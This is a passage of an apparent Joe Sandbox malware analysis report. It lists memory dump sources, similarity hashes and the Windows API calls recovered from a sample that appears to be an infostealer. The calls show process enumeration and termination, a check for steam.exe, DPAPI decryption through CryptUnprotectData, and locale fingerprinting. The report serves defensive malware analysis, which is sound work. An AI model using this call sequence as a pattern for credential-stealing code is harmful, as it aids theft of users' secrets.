                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 2c2733f86a8a7c2849fd4cd1d4163b874e016b6533d7ebfc4052b571342ba1b7
                                • Instruction ID: 300ee1d04a862c65c5ad63856f6e3f657941bf0b2cb98bcc98cfdf1207e7b3c2
                                • Opcode Fuzzy Hash: 2c2733f86a8a7c2849fd4cd1d4163b874e016b6533d7ebfc4052b571342ba1b7
                                • Instruction Fuzzy Hash: FF41853051021D9BDB72EF28ED89AAE77F4AF10304F015168FA899B1A1CF7CDC51AB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !,8$&@,$1^zf$=2[?$HVw$Jjw$a8Ug${"$$5_o$:?$s;
                                • API String ID: 0-4025474785
                                • Opcode ID: 3ac1bf0da465575a4988a81b31576677ce14481d17170c9d97e13042719c0977
                                • Instruction ID: 3299f4738db64980aea0d614668b1b84bee9f6af547a14708a8411bcae412629
                                • Opcode Fuzzy Hash: 3ac1bf0da465575a4988a81b31576677ce14481d17170c9d97e13042719c0977
                                • Instruction Fuzzy Hash: 73B2F9F3A0C2149FE304AE2DEC8567ABBE9EF94720F16453DEAC5C7740EA3558018697
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 010146B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 010146C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 010146DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 010146ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 01014702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 01014711
                                • CloseHandle.KERNEL32(00000000), ref: 01014718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 01014726
                                • CloseHandle.KERNEL32(00000000), ref: 01014731
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 646aa348660e612282b59e57c5b0e237cf4b0057645fe59dbd94b432378621bb
                                • Instruction ID: bbdcb3208d75cb63d103f32f60591c995ce8a7ec6b201def0824eb312eedd022
                                • Opcode Fuzzy Hash: 646aa348660e612282b59e57c5b0e237cf4b0057645fe59dbd94b432378621bb
                                • Instruction Fuzzy Hash: D901A131501128BBEB315F64AC8CFFE37BCEB49B15F000088FA45D5088EF7899848B65
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 01014628
                                • Process32First.KERNEL32(00000000,00000128), ref: 01014638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 0101464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 01014660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 01014672
                                • CloseHandle.KERNEL32(00000000), ref: 0101467D
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                • Opcode ID: e40740db47fabc79ab7a1ac3e0f8dc1770a511a1398e2fdcb49c3b245a3e6c84
                                • Instruction ID: 70396f434772713f60ba964b007c92dfbac6c1f792974ba2934a0f0de1e7a5fe
                                • Opcode Fuzzy Hash: e40740db47fabc79ab7a1ac3e0f8dc1770a511a1398e2fdcb49c3b245a3e6c84
                                • Instruction Fuzzy Hash: 08018471601128ABEB709E64AC4CFEE77ACEB0C755F0001D5FA48D1044EB78D6948BE5
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01004B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01004B7F
                                • lstrlen.KERNEL32(01024CA8), ref: 01004B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004BA7
                                • lstrcat.KERNEL32(00000000,01024CA8), ref: 01004BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 01004BFA
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                • Opcode ID: 5546a1f67c90b721d112f57230ae42e611dcacc17cc05b6cad78711c8a8d2906
                                • Instruction ID: bb614699479752800f4cc9aa15f220544a1e0c1d27709f7c4faa5e8edc78ec8b
                                • Opcode Fuzzy Hash: 5546a1f67c90b721d112f57230ae42e611dcacc17cc05b6cad78711c8a8d2906
                                • Instruction Fuzzy Hash: 2C31613151051D9BEB72EF28EC89AAE77F9AF40300F001168FB45D72A1CB789C11AB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: )t3b$-Qj}$=u]$Sg+$^_xW$7:l$^<$qWR
                                • API String ID: 0-3336059591
                                • Opcode ID: 1cbbaaf11e90bb220fefcccb0f7d178c84dc171141e2336d88063aaa0eab080b
                                • Instruction ID: 8aa1def37f1d82850acb46a28ec7c70f4aa3e76288039e2a003ab47ab7e9ec76
                                • Opcode Fuzzy Hash: 1cbbaaf11e90bb220fefcccb0f7d178c84dc171141e2336d88063aaa0eab080b
                                • Instruction Fuzzy Hash: 37B238F36082049FE304AE2DEC8567AFBE5EFD4620F1A853DE6C4C7744EA3598058697
                                APIs
                                  • Part of subcall function 010171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 010171FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 01012D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 01012DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 01012DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 01012DEC
                                • LocalFree.KERNEL32(00000000), ref: 01012FCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: ca303550297fff3969400a22c745ea69a5da31d1a2a568b6ebc49fcac63d74e5
                                • Instruction ID: 5560bcdd929aa7e19a7f849e9ad17087ef2ca9b5bbae460bc4abb12ce26091c3
                                • Opcode Fuzzy Hash: ca303550297fff3969400a22c745ea69a5da31d1a2a568b6ebc49fcac63d74e5
                                • Instruction Fuzzy Hash: 10B11C70900214DFDB65CF19D548B99BBF1FB44328F29C1ADE5485B2A9D77A9C82CF80
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 01012C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 01012C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 01012C58
                                • wsprintfA.USER32 ref: 01012C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: f55083e97fc5a5ea6a9641dd0eb3e883ff0b51358f9acf8c80161a52506ffa18
                                • Instruction ID: e47b478a245c77ec58831efa3a0558a5fc42f058e5f0234ba610a8269e74dfcb
                                • Opcode Fuzzy Hash: f55083e97fc5a5ea6a9641dd0eb3e883ff0b51358f9acf8c80161a52506ffa18
                                • Instruction Fuzzy Hash: 7801F771A00214BBDB288F58DC4DF6DBB69EB84621F104369F915DB2C4D77819008BD5
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *;$'(w~$(j_$RvWE$w_~
                                • API String ID: 0-722192857
                                • Opcode ID: 73b8e635258c6dc7f997d3d71b083a9af21b6179933b49a4b6e91eb503a14009
                                • Instruction ID: 1caf847c98fc573f3393aa579a7561d59f8347b41c98ab94f3b58318e6901290
                                • Opcode Fuzzy Hash: 73b8e635258c6dc7f997d3d71b083a9af21b6179933b49a4b6e91eb503a14009
                                • Instruction Fuzzy Hash: D9B2E6F3A0C200AFE3046E2DEC8567AFBE9EF94720F16492DEAC4D7744E67558018697
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 01011B72
                                  • Part of subcall function 01011820: lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0101184F
                                  • Part of subcall function 01011820: lstrlen.KERNEL32(00D56B90), ref: 01011860
                                  • Part of subcall function 01011820: lstrcpy.KERNEL32(00000000,00000000), ref: 01011887
                                  • Part of subcall function 01011820: lstrcat.KERNEL32(00000000,00000000), ref: 01011892
                                  • Part of subcall function 01011820: lstrcpy.KERNEL32(00000000,00000000), ref: 010118C1
                                  • Part of subcall function 01011820: lstrlen.KERNEL32(01024FA0), ref: 010118D3
                                  • Part of subcall function 01011820: lstrcpy.KERNEL32(00000000,00000000), ref: 010118F4
                                  • Part of subcall function 01011820: lstrcat.KERNEL32(00000000,01024FA0), ref: 01011900
                                  • Part of subcall function 01011820: lstrcpy.KERNEL32(00000000,00000000), ref: 0101192F
                                • sscanf.NTDLL ref: 01011B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 01011BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 01011BC6
                                • ExitProcess.KERNEL32 ref: 01011BE3
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: 8b3e2ecf22b0eaa31eb6daf29497e55a64b6d9bb0082eaf9797a6e257ba694e4
                                • Instruction ID: 58198d90c2fd865abc18c28cee6d17ca1b02c29a7adcee7ff2e5b6c48179e650
                                • Opcode Fuzzy Hash: 8b3e2ecf22b0eaa31eb6daf29497e55a64b6d9bb0082eaf9797a6e257ba694e4
                                • Instruction Fuzzy Hash: 4D21F3B1518305AF8764DF69D88489FBBF8FFD8214F409A1EF599C3214E734D6098BA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FF775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00FF7765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FF778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00FF77AD
                                • LocalFree.KERNEL32(?), ref: 00FF77B7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 9d77cc30f48ef70d83d164d5e731f43536ad66d5b771fd8f1828ea7242d0b3ec
                                • Instruction ID: bb95921cdd2c9d7b69a6a966685484f3745b2c4004e29991ee0c32ece4991362
                                • Opcode Fuzzy Hash: 9d77cc30f48ef70d83d164d5e731f43536ad66d5b771fd8f1828ea7242d0b3ec
                                • Instruction Fuzzy Hash: DE011275B403187BEB20DE94DC4AFAE7778EB44B15F104145FB09EA2C4D6B499408794
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 9gO$\an$elK*$y[w
                                • API String ID: 0-4176420793
                                • Opcode ID: 22424ad36f3c1c8ab3d183e96d3e8913b66c5fb96af3cf148f18db7786e58e0b
                                • Instruction ID: fb81d6d1a6da68796d2a62ca5b238748799d1fd5e2d5ed9ff87f9bc510902df6
                                • Opcode Fuzzy Hash: 22424ad36f3c1c8ab3d183e96d3e8913b66c5fb96af3cf148f18db7786e58e0b
                                • Instruction Fuzzy Hash: B09219F3A08204AFD7046E2DEC8567AFBE5EF94320F1A493DE6C4C7344EA7598058697
                                APIs
                                  • Part of subcall function 010171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 010171FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01013A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 01013AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 01013ABF
                                  • Part of subcall function 01017310: lstrlen.KERNEL32(------,00FF5BEB), ref: 0101731B
                                  • Part of subcall function 01017310: lstrcpy.KERNEL32(00000000), ref: 0101733F
                                  • Part of subcall function 01017310: lstrcat.KERNEL32(?,------), ref: 01017349
                                  • Part of subcall function 01017280: lstrcpy.KERNEL32(00000000), ref: 010172AE
                                • CloseHandle.KERNEL32(00000000), ref: 01013BF7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 639628e822b540999c1be95faf19513823f56f62edd1ba80eac3c29c4599ec32
                                • Instruction ID: b0ac9d239cc815cb120764d2fb7289a411856b90ae61b1020ad97ef26ed3d5ff
                                • Opcode Fuzzy Hash: 639628e822b540999c1be95faf19513823f56f62edd1ba80eac3c29c4599ec32
                                • Instruction Fuzzy Hash: DF81F630900214DFDB65CF19D988B95BBE1FB44329F29C1EDD5489F2AAD77A9882CF40
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00FFEA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00FFEA7E
                                • lstrcat.KERNEL32(0101CFEC,0101CFEC), ref: 00FFEB27
                                • lstrcat.KERNEL32(0101CFEC,0101CFEC), ref: 00FFEB49
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 211a5cc0852f4d075e208d21def0881edd2b7b5141c8118a4d50c5ec41c9fe4b
                                • Instruction ID: 25474ae3bf1c9e42c4bfbfeae5025d004992eeff684ba7993139a1f85947e967
                                • Opcode Fuzzy Hash: 211a5cc0852f4d075e208d21def0881edd2b7b5141c8118a4d50c5ec41c9fe4b
                                • Instruction Fuzzy Hash: BF31D575E40119ABEB209F58EC49FEEB77CDF84715F0041A9FA09E7244D7B49A04CBA1
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 010140CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 010140DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 010140E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 01014113
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                • Opcode ID: 1d20a8f8e08bf1e809e1df7f0785d42497a550ba56e093b3ee1f939961d0aed8
                                • Instruction ID: c5bb5cd228b908e724e56ce7109dbadb2504956f02f943059a530822d0e2c8ee
                                • Opcode Fuzzy Hash: 1d20a8f8e08bf1e809e1df7f0785d42497a550ba56e093b3ee1f939961d0aed8
                                • Instruction Fuzzy Hash: 33011E74600209BBEB20DFA5EC89B6A7BEDEF45311F108199FD49C7244DB75D980CB54
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00FF9B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FF9B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00FF9B61
                                • LocalFree.KERNEL32 ref: 00FF9B70
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
